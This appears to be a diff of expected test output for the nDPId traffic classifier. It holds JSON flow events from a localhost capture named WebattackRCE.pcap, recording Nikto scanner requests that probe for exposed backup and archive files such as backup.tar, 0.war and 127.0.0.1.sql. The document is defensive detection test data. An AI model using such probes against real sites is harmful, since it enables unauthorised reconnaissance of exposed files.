+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":375,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277269,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277270,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/A5hAAEAGOJ9\/AAABfwAAAcR4H5CBQjs0aZw5xIAYAED+swAAAQEICp1m\/T6dZv0+R0VUIC8xMjcuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277270,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277272,"pkt":"AAAAAAAAAAAAAAAACABFAADA729AAEAGTMZ\/AAABfwAAAcR6H5Cm4tfMZrHSAYAYAED+tAAAAQEICp1m\/UCdZv1AR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":377,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277272,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277274,"pkt":"AAAAAAAAAAAAAAAACABFAADAlOZAAEAGp09\/AAABfwAAAcR8H5CKg6xDWKPSxIAYAED+tAAAAQEICp1m\/UKdZv1CR0VUIC8xLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277274,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277276,"pkt":"AAAAAAAAAAAAAAAACABFAAC9in1AAEAGsbt\/AAABfwAAAcR+H5AyA7LdjyrNp4AYAED+sQAAAQEICp1m\/USdZv1DR0VUIC8wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":379,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277276,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_packet_id":1,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277277,"pkt":"AAAAAAAAAAAAAAAACABFAAC906lAAEAGaI9\/AAABfwAAAcSAH5AxZOsBFr\/0GYAYAED+sQAAAQEICp1m\/UWdZv1FR0VUIC8wLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":380,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277277,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_packet_id":1,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277278,"pkt":"AAAAAAAAAAAAAAAACABFAADCR05AAEAG9OV\/AAABfwAAAcSCH5Cv93\/sjlpOBIAYAED+tgAAAQEICp1m\/UadZv1GR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277278,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_packet_id":1,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277279,"pkt":"AAAAAAAAAAAAAAAACABFAADCyNdAAEAGc1x\/AAABfwAAAcSEH5CsG\/B+ct073oAYAED+tgAAAQEICp1m\/UedZv1HR0VUIC9iYWNrdXAudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277279,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277281,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_packet_id":1,"flow_last_seen":1576420277281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277281,"pkt":"AAAAAAAAAAAAAAAACABFAADFYHdAAEAG27l\/AAABfwAAAcSGH5C8uFjeIpIdX4AYAED+uQAAAQEICp1m\/UidZv1IR0VUIC8xMjcuMC4wLjEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 